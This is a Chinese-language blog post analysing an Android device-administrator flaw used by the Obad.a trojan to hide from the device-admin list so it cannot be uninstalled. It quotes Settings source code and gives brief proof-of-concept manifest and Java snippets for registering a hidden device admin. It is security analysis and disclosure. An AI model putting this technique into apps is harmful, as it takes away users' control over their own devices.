Android设备管理器漏洞

最新推荐文章于 2021-05-26 10:17:35 发布
最新推荐文章于 2021-05-26 10:17:35 发布
阅读量1w 收藏 12
点赞数 7
文章标签: Obda.a 设备管理器漏洞 Android防卸载
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/androidsecurity/article/details/9124747
版权

本文章由Jack_Jia编写,转载请注明出处。  

文章链接:http://blog.csdn.net/jiazhijun/article/details/9124747
作者:Jack_Jia    邮箱: 309zhijun@163.com


一、漏洞描述

         目前被称为“史上最强Android木马”的病毒Backdoor.AndroidOS.Obad.a利用Android设备管理器漏洞使用户无法通过正常方式卸载。其实该漏洞早在去年底已被发现。(http://www.anguanjia.com/?c=news_view&id=435

       注册为“设备管理器”的应用是无法被直接卸载的。只有取消激活“设备管理器”后才可以直接卸载。

       木马可以利用Android设备管理器漏洞达到在设备管理器列表“隐身”的效果。这样用户就无法进去“取消激活”页面,从而达到无法卸载的目的。


二、影响版本

       Android2.2以上(4.0,4.1,4.2)

三、漏洞原理

       首先我们来看一下Settings app如何形成设备管理器列表的:


       相关类:

       packages\apps\settings\src\com\android\settings\DeviceAdminSettings.java


   public class DeviceAdminSettings extends ListFragment {
 
    DevicePolicyManager mDPM;
    final HashSet<ComponentName> mActiveAdmins = new HashSet<ComponentName>();
    final ArrayList<DeviceAdminInfo> mAvailableAdmins = new ArrayList<DeviceAdminInfo>();

    @Override
    public void onResume() {
        super.onResume();
        updateList();
    }

    void updateList() {
        mActiveAdmins.clear();
        List<ComponentName> cur = mDPM.getActiveAdmins();
        if (cur != null) {
            for (int i=0; i<cur.size(); i++) {
                mActiveAdmins.add(cur.get(i));
            }
        }

        mAvailableAdmins.clear();
        List<ResolveInfo> avail = getActivity().getPackageManager().queryBroadcastReceivers(
                new Intent(DeviceAdminReceiver.ACTION_DEVICE_ADMIN_ENABLED),
                PackageManager.GET_META_DATA);//通过查询广播”android.app.action.DEVICE_ADMIN_ENABLED“来得到可用的设                                                                                             //备管理器程序列表
        int count = avail == null ? 0 : avail.size();
        for (int i=0; i<count; i++) {
            ResolveInfo ri = avail.get(i);
            try {
                DeviceAdminInfo dpi = new DeviceAdminInfo(getActivity(), ri);
                if (dpi.isVisible() || mActiveAdmins.contains(dpi.getComponent())) {
                    mAvailableAdmins.add(dpi);
                }
                //如果应用已激活设备管理器&&注册了”android.app.action.DEVICE_ADMIN_ENABLED“就出现在可用设备管理器列表
            } catch (XmlPullParserException e) {
                Log.w(TAG, "Skipping " + ri.activityInfo, e);
            } catch (IOException e) {
                Log.w(TAG, "Skipping " + ri.activityInfo, e);
            }
        }
        
        getListView().setAdapter(new PolicyListAdapter());
    }

   .......
    
    class PolicyListAdapter extends BaseAdapter {
      .......

        public void bindView(View view, int position) {
            final Activity activity = getActivity();
            ViewHolder vh = (ViewHolder) view.getTag();
            DeviceAdminInfo item = mAvailableAdmins.get(position);//显示mAvailableAdmins中数据
            vh.icon.setImageDrawable(item.loadIcon(activity.getPackageManager()));
            vh.name.setText(item.loadLabel(activity.getPackageManager()));
            vh.checkbox.setChecked(mActiveAdmins.contains(item.getComponent()));
            try {
                vh.description.setText(item.loadDescription(activity.getPackageManager()));
            } catch (Resources.NotFoundException e) {
            }
        }
    }

}
   

由Android Settings App源代码可以看出,如果想在设备管理器列表中”隐身“,只要不注册”android.app.action.DEVICE_ADMIN_ENABLED“广播就行。

四、POC代码
 

AndroidMainfest.xml文件注册组件:

   
<receiver Android:name=".deviceAdminReceiver" android:label="@string/app_name" 
   Android:description="@string/description" android:permission="android.permission.BIND_DEVICE_ADMIN"> 
  
   <meta-data Android:name="android.app.device_admin" 
               Android:resource="@xml/device_admin" /> 
  
</receiver>

java代码注册激活设备管理器:

   
Intent intent = new Intent( 
       DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);
ComponentName  mDeviceComponentName = new ComponentName("packagename","packagename.deviceAdminReceiver"); 
intent.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN, 
       mDeviceComponentName);
this.startActivity(intent,0); 


五、相关链接

      http://www.anguanjia.com/?c=news_view&id=435
      http://blog.csdn.net/jiazhijun/article/details/9045773

Jack_Jia
关注
  • 7
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
android设置管理员权限设置,android 获取超级管理员权限,进行锁屏、恢复出厂设置...
weixin_34668147的博客
05-26 2460
获取超级管理员权限步骤:1.创建 MyAdmin 的广播接受者 继承 DeviceAdminReceiver如:package cn.itcast.lockscreen; import android.app.admin.DeviceAdminReceiver; public class MyAdmin extends DeviceAdminReceiver { }配置如下:android:res...
Android设备管理器漏洞分析!
01-05 133
一、漏洞描述 目前被称为“史上最强Android木马”的病毒Backdoor.AndroidOS.Obad.a利用Android设备管理器漏洞使用户无法通过正常方式卸载。其实该漏洞早在去年底已被发现。(http://safe.ijiami.cn/) 注册为“设备管理器”的应用是无法被直接卸载的。只有取消激活“设备管理器”后才可以直接卸载。 木马可以利用Android设备管理器漏洞达到在设备管
编写一个无法卸载的App - 设备管理器漏洞
chaozhung的专栏
08-26 2838
利用设备管理器漏洞实现APP无法卸载
Android设备管理器漏洞2--阻止用户取消激活设备管理器
热门推荐
移动安全研究和Android/iOS/小程序隐私合规
10-10 1万+
日前,百度安全实验室发现手机木马开始利用另一新的Android设备管理器漏洞,新的设备管理器漏洞是由于Android系统在取消激活设备管理器流程的设计缺陷引起的,恶意软件利用该设计缺陷,可以阻止用户取消激活设备管理器,进而达到反卸载的目的。该漏洞存在于Android系统所有版本。
编写一个无法卸载的App - 设备管理器漏洞--进阶
chaozhung的专栏
05-10 2351
Android上使用设备管理器漏洞达到卸载的目的请参照:https://blog.csdn.net/chaozhung_no_l/article/details/52329341经过多设备测试后发现一个卸载漏洞,在取消激活黑屏后,再次进入界面时点击系统Back键或者点击Menu键会在最近任务列表内出现设备管理器取消确认的弹窗,这样就可以进一步的卸载。该问题出现原因无非下面两种状况:1、get...
X-Ray检测Android设备Root漏洞过程分析
移动编程
03-11 301
本文章由Jack_Jia编写,转载请注明出处。文章链接:http://blog.csdn.net/jiazhijun/article/details/8660226作者:Jack_Jia 邮箱:[email protected] 一、序言 到目前为止Android已被发现大量的提权漏洞,虽然这些提权漏洞随着系统版本的升级已被解决,但是市场上还存在着大量使用老版本系统的设备。...
android手机安全卫士
04-13
2、通过分析恶意代码的提权漏洞,讲解如何维护系统的安全。 3、通过linux键盘驱动案例的讲解,分析盗号木马的原理及其实现方式。 4、恶意软件发展速度的确一日千里,安全软件也要与时俱进,世面上的手机病毒已经具有...
android-exploit-
05-27
根植的Android设备 Android骇客工具 行动应用程式(Android专用) -Android远程管理工具 枚举本地主机,发现漏洞及其漏洞,破解Wi-Fi密码,安装后门的工具blablabla! 合一Android Pentest工具 网络映射,端口...
drozer-agent:Mercury安全评估框架的Android代理
02-02
打开Android Studio并从中启动Android SDK管理器(“工具”>“ Android”>“ SDK Manager”) 检查是否已安装这两个组件并将其更新为最新版本。 如有必要,请安装或升级它们。 Android SDK平台工具 Android支持库 ...
dSploit-Android平台安全管理工具包
01-20
dSploit--开源的专业的Android平台安全管理工具包 ...在Android设备至少2.3(Gingerbread)版本的操作系统。 该设备必须root。 设备必须有一个BusyBox的完全安装,这意味着安装所有的工具(而不是部分安装)。
【最新版】Dashlane.dmg 6.2004.0.32116【亲测可用】最好的密码管理器
04-13
自动将您的 Dashlane 数据同步到每台设备,无论您是 Apple 的忠实用户、Android 的粉丝,还是两者皆有之。 每次都在每个帐户上自动填充正确的用户名和密码。 一次点击即可填充地址和其他表单。 无需再寻找卡号,...
安卓卸载的实现。。
01-02
卸载的实现,具体http://blog.csdn.net/u012833250/article/details/50448136
Android设置APP无法卸载
08-30
Android利用设备管理器实现APP无法卸载功能
android 卸载功能,android手机上有没有有卸载功能的隐私加密软件。谢谢!最好用的最强大的...
weixin_36387422的博客
05-26 1746
你说的就是加把锁,软件界面与加密方式1、金山隐私保险箱一贯秉持简单实用的原则,在界面上也不例外,第一印象就是一目了然。进入软件,在“设置”选项里可进行“更改解锁方式”、“更改密码”等操作,值得一提的是,解锁方式提供了“图案”和“数字”两种加密方式可供选择。使用感受:界面清新,功能图标醒目,便于寻找和操作。两种加密方式让加密性能提高一倍。2、隐私保护官方介绍“隐私保护”是一款以能保护手机文件和应用程...
Android开发之获取系统管理权限,即DevicePolicyManager和DeviceAdminReceiver的使用
diaolapei9880的博客
03-24 668
参考:http://www.cnblogs.com/androidez/archive/2013/02/17/2915020.html 1.创建AdminReceiver,继承DeviceAdminReceiver 1 import android.app.admin.DeviceAdminReceiver; 2 /* 3 * 设备管理器,可以设置锁屏和清除数据。请查看AP...
Android中的锁屏DevicePolicyManager申请系统管理权限
05-13 1247
效果图:      Caused by:  java.lang.SecurityException: No active admin owned by uid 10038 for policy #3 该错误需要把应用程序升级为拥有系统管理员权限,写一个广播接收者,给该广播接收者去申请系统管理员的权限,让操作系统给广播接收者授权。(其实就去激活系统的一个授权的组件)让用户自己激活
Android止意外卸载
lemisky的博客
10-21 2224
最近有个奇怪的想法,如何止应用不小心被卸载呢? 简单的解决方案:将应用设置为设备管理器 public class Policy { private DevicePolicyManager policyManager; private ComponentName componentName; public Policy(Activity activity) { ...
android高版本5.0以上卸载
风吹过的博客
05-10 3847
记录思路,代码有时间补上:    卸载方式:           1. 电脑360连接手机,卸载程序;           2.手机桌面拖动卸载;           3.进入应用设置卸载;    卸载方法:           1.类似于电脑360连接手机,通过电脑卸载,可以通过自己的应用,激活设备管理器,激活后,此方式卸载无效;           2.
神经网络与量子计算的交叉研究.pptx
最新发布
04-19
神经网络与量子计算的交叉研究.pptx
Android常规漏洞分析
08-25
2. 拒绝服务(DoS)攻击:攻击者可能利用Android系统中的某些漏洞来对设备或应用程序进行拒绝服务攻击,导致设备无法正常工作或应用程序无法响应用户请求。对于这种类型的漏洞分析,可以通过模拟攻击场景并检查应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值